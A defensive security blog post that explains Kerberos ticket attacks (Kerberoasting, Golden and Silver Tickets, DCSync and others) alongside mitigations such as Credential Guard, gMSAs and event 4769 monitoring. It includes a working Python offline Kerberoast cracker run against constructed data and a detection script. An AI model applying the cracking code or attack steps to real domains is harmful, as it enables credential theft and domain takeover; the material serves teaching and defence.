
Post 5: Credential Theft: Understanding and Securing Tickets

In Windows enterprise environments, Kerberos is the default authentication protocol. A user proves their identity once to the Key Distribution Center (KDC, a role every domain controller holds) and receives a Ticket Granting Ticket (TGT); the TGT is then exchanged for service tickets that prove the user's identity to individual services. Because those tickets, and the keys they are encrypted with, are the whole basis of trust, a family of attacks targets them directly: stealing tickets from memory, using stolen keys to request tickets, cracking tickets offline, and forging tickets outright. This post walks through those attacks, from Pass the Ticket to the Golden Ticket, and the controls that blunt them.


The Kerberos Authentication Landscape

Kerberos Authentication Protocol:

  • A TGT proves the user's identity to the KDC; service tickets, obtained with the TGT, prove it to individual services. Each service ticket is encrypted with the long-term key of the account that runs the service.

  • A TGT is valid for 10 hours by default (renewable for up to 7 days). During that window the client obtains service tickets without re-entering credentials, which is exactly what makes a stolen ticket valuable.

  • Nearly all Windows activity runs under a user or computer account, so the volume of authentication traffic, and therefore of tickets and keys sitting in LSASS memory, is large.


Ticket Attacks: Exploiting Kerberos Weaknesses

1. Pass the Ticket:

  • An attacker with local administrator or SYSTEM rights on a host can dump every Kerberos ticket in LSASS memory with tools such as Mimikatz.

  • An exported ticket, imported into the attacker's own session, authenticates them as the ticket's owner to whatever that ticket covers (a TGT covers everything the user can reach) until it expires.

  • This "transplants" the user without any knowledge of the user's password or hash.

2. Overpass the Hash (Pass the Key):

  • The attacker dumps the account's NT hash (or AES key) and uses it as the Kerberos long-term key to request a TGT, then service tickets. The NT hash is the RC4-HMAC key, which is why a hash alone is enough.

  • Authentication happens over Kerberos, so it works where NTLM is disabled or closely monitored. If the domain only issues AES tickets, the attacker needs the AES key rather than the NT hash.

3. Kerberoasting:

  • Any authenticated domain user can request a service ticket for any registered SPN; the KDC does not check whether the user is authorized to use that service.

  • Because the ticket is encrypted with the service account's password-derived key, attackers request tickets for SPNs owned by privileged user accounts and crack them offline, with RC4-HMAC (etype 23) tickets cracking fastest. Computer accounts are poor targets because their passwords are long and random.

4. Golden Ticket:

  • The attacker first obtains domain-admin-level access (or replication rights) and extracts the krbtgt account's key, for example via DCSync or from a domain controller's NTDS.dit.

  • With that key they forge TGTs for any user, including non-existent ones, with any group membership and any lifetime; the KDC trusts anything encrypted under the krbtgt key, so the forged ticket is accepted without a real logon.

  • The result is persistence that survives enterprise-wide user password resets; only resetting the krbtgt password twice (with replication in between) invalidates the forged tickets.

5. Silver Ticket:

  • The attacker forges a service ticket with the dumped key of the account that runs the service, most often a computer account for host-based services such as CIFS, HTTP or HOST.

  • It grants access to that single service or computer, impersonating any user, and because the forged ticket never passes through the KDC, no ticket-request event is logged on the domain controller for it.

6. Skeleton Key:

  • An attacker with domain-admin rights patches LSASS on a domain controller so that a single master password is accepted for any domain user, alongside each user's real password.

  • Access persists even after users change their passwords, but the patch lives only in memory and is lost when the domain controller reboots.

7. DCSync:

  • Abuses the MS-DRSR directory replication protocol to impersonate a domain controller and ask a real one to replicate password hashes, including the krbtgt hash needed for a Golden Ticket.

  • Requires the replication rights (Replicating Directory Changes and Replicating Directory Changes All) that Domain Admins, Enterprise Admins and domain controllers hold by default; any other principal granted them is a finding.
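An added worked example (not code from the original post) showing what items 2 and 3 above rely on: the NT hash is MD4 of the UTF-16LE password and doubles as the RC4-HMAC Kerberos key, and a service ticket encrypted under that key can be cracked offline once captured. It encrypts a ticket body the way the KDC does, prints it in the $krb5tgs$23$ format Rubeus and Impacket emit, and then recovers the password. The SPN, realm, service password, confounder and word list are constructed; MD4 and RC4 are implemented inline because OpenSSL 3 builds of Python do not expose them.

```python
"""Kerberoasting offline, end to end (added example, not from the original post).
Sample SPN, realm, password, confounder and word list are constructed.
"""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    rotl = lambda x, s: ((x << s) | (x >> (32 - s))) & MASK32
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK32, (b0 + b) & MASK32, (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash, which is also the Kerberos RC4-HMAC long-term key (overpass-the-hash)."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


USAGE_TICKET = struct.pack("<I", 2)  # RFC 4757 key usage 2: EncTicketPart of a service ticket


def rc4_hmac_encrypt(key: bytes, confounder: bytes, plaintext: bytes) -> bytes:
    """What the KDC does with the service account's key: checksum(16) || RC4(data)."""
    k1 = hmac.new(key, USAGE_TICKET, hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, blob: bytes):
    """Returns confounder||plaintext if the checksum verifies under key, else None."""
    checksum, edata = blob[:16], blob[16:]
    k1 = hmac.new(key, USAGE_TICKET, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, edata)
    return data if hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum) else None


def to_hashcat(user: str, realm: str, spn: str, blob: bytes) -> str:
    """hashcat mode 13100 / john krb5tgs line."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_krb5tgs(line: str, wordlist):
    """One MD4, three HMAC-MD5 and one RC4 pass per guess, without ever contacting the
    domain controller, which is why the cracking phase produces no DC events."""
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only RC4-HMAC (etype 23) hashes are handled here")
    checksum_hex, edata_hex = line.rsplit("$", 2)[1:]
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), blob) is not None:
            return candidate
    return None


# Constructed demo data: a weak service-account password and a placeholder ticket body
# (a real EncTicketPart is DER-encoded and carries the PAC). The KDC uses a random
# confounder; it is fixed here so the run is reproducible.
SERVICE_PASSWORD = "Summer2019!"
CONFOUNDER = bytes.fromhex("0011223344556677")
TICKET_BODY = b"EncTicketPart placeholder for MSSQLSvc/sql01.corp.local:1433"
SAMPLE_LINE = to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433",
                         rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), CONFOUNDER, TICKET_BODY))
WORDLIST = ["Password1", "Welcome1", "Summer2019!", "P@ssw0rd"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_krb5tgs(SAMPLE_LINE, WORDLIST))
```

The same nt_hash output is what overpass-the-hash feeds into an AS-REQ, and the same rc4_hmac_decrypt check is what hashcat runs billions of times per second against a captured ticket; a 240-byte random gMSA password or an AES-only service account takes this whole path away from the attacker.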


Mitigation Strategies: Defending Against Kerberos Threats

1. Credential Guard:

  • Available on Windows 10 / Server 2016 and later (Enterprise editions); uses virtualization-based security to move LSA secrets (NTLM hashes, TGTs and their session keys) into an isolated process that the normal OS, even with SYSTEM rights, cannot read.

  • Prevents dumping those secrets for pass-the-hash, overpass-the-hash and pass-the-ticket. It does not stop an attacker who already controls the logged-on session from using the credentials through normal APIs, and service tickets are not covered.

2. Remote Credential Guard and Restricted Admin:

  • Both are RDP modes that keep the user's credentials from being sent to the remote host: Restricted Admin logs the session on as the remote machine's computer account, while Remote Credential Guard redirects Kerberos requests back to the client so the TGT never leaves it.

  • Mitigates credential and ticket theft from the hosts administrators connect to. Note that Restricted Admin mode also allows an attacker to RDP with only a hash or ticket, so pair it with the other controls here.

3. Managed Service Accounts (MSA) and Group Managed Service Accounts (gMSA):

  • Active Directory generates a 240-byte random password, rotates it automatically (every 30 days by default) and never discloses it to administrators.

  • Mitigates Kerberoasting because a password of that length and randomness cannot be cracked from a captured ticket, and it changes anyway before any long-running attempt could finish.

4. Active Monitoring:

  • Monitor service-ticket requests (Security event 4769) for privileged service accounts, in particular tickets issued with RC4 (encryption type 0x17) and bursts of requests for many different SPNs from one user, which is the signature of a Kerberoasting sweep.

  • Give service accounts long random passwords (25 or more characters), rotate them, and configure them for AES only so that RC4 tickets are not issued for them.

5. Changing krbtgt Account Password:

  • Reset the krbtgt password on a schedule and after any suspected domain compromise. The KDC honours tickets issued under the previous key as well as the current one, so the reset must be done twice, with replication completed in between, before Golden Tickets minted with the old key stop working.
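An added example (not from the original post) of the monitoring item above, run over constructed Windows Security event 4769 records: it flags RC4 tickets issued for user-owned SPNs, RC4 tickets for accounts that have AES keys (a downgrade, which is what Kerberoasting tools typically force), and one requester pulling tickets for many SPNs within a short window regardless of encryption type. The field names match the EventData elements of event 4769; the account inventory, thresholds and log lines are constructed, and in production the records come from Get-WinEvent or a SIEM.

```python
"""Kerberoasting detection over event 4769 records (added example, not from the
original post). Records, account inventory and thresholds are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
WINDOW = timedelta(seconds=60)
SPRAY_THRESHOLD = 3  # distinct user-owned SPNs per requester inside WINDOW

# Constructed inventory; in production read msDS-SupportedEncryptionTypes from AD.
# True means the account has AES keys, so an RC4 ticket for it is a downgrade.
SERVICE_ACCOUNT_HAS_AES = {"svc_sql": True, "svc_web": False, "svc_backup": True}

# Constructed 4769 records: "<time> <event id> key=value ...". TargetUserName is the
# requester, ServiceName the account owning the SPN, Status 0x0 means a ticket was issued.
SAMPLE_EVENTS = [
    "2024-03-04T09:12:01 4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=10.0.0.25 Status=0x0",
    "2024-03-04T09:12:05 4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.25 Status=0x0",
    "2024-03-04T09:40:10 4769 TargetUserName=tlow@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.77 Status=0x0",
    "2024-03-04T09:40:11 4769 TargetUserName=tlow@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.77 Status=0x0",
    "2024-03-04T09:40:12 4769 TargetUserName=tlow@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.77 Status=0x0",
    "2024-03-04T09:40:13 4769 TargetUserName=tlow@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.0.0.77 Status=0x0",
    "2024-03-04T10:01:00 4769 TargetUserName=tlow@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.77 Status=0x1B",
]


def parse_event(line: str) -> dict:
    """Parse one constructed record; real input is the XML/JSON that Get-WinEvent returns."""
    ts, event_id, *fields = line.split()
    rec = {"time": datetime.fromisoformat(ts), "id": int(event_id)}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def is_roastable(service: str) -> bool:
    """User-owned SPNs are the Kerberoast targets. Computer accounts ($) have long random
    passwords and krbtgt entries are TGT renewals, so neither is worth alerting on."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def analyze(lines) -> list:
    """Return one alert dict per finding: rule, requesting user, service(s), source IP."""
    alerts = []
    per_user = defaultdict(list)
    for rec in sorted(map(parse_event, lines), key=lambda r: r["time"]):
        if rec["id"] != 4769 or rec["Status"] != "0x0":
            continue  # only tickets that were actually issued can be cracked
        service = rec["ServiceName"]
        if not is_roastable(service):
            continue
        user = rec["TargetUserName"]
        if rec["TicketEncryptionType"] == RC4_HMAC:
            rule = "rc4_downgrade" if SERVICE_ACCOUNT_HAS_AES.get(service) else "rc4_service_ticket"
            alerts.append({"rule": rule, "user": user, "service": service, "ip": rec["IpAddress"]})
        per_user[user].append((rec["time"], service))  # any etype counts toward a sweep
    for user, requests in per_user.items():
        window = []
        for when, service in requests:
            window = [(t, s) for t, s in window if when - t <= WINDOW] + [(when, service)]
            distinct = sorted({s for _, s in window})
            if len(distinct) >= SPRAY_THRESHOLD:
                alerts.append({"rule": "bulk_spn_requests", "user": user,
                               "service": ",".join(distinct), "ip": None})
                break  # one alert per requester is enough to open an investigation
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The sweep rule deliberately counts AES tickets as well, since AES tickets can still be cracked (slowly) and the burst pattern is the reliable signal; the RC4 rules are what becomes nearly silent once service accounts are set to AES only, which turns any remaining RC4 ticket into a high-fidelity alert.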


Conclusion

Kerberos ticket attacks remain a formidable challenge in Windows enterprise environments because they abuse the protocol exactly as designed: a valid ticket or key is indistinguishable from a legitimate one. Understanding how each attack obtains its ticket or key, and layering the controls above (Credential Guard to keep secrets out of reach, gMSAs and AES-only service accounts to make tickets uncrackable, monitoring of 4769 events, and disciplined krbtgt resets), significantly reduces the risk. Stay vigilant, stay informed, and stay ahead of evolving threats.


Akash Patel
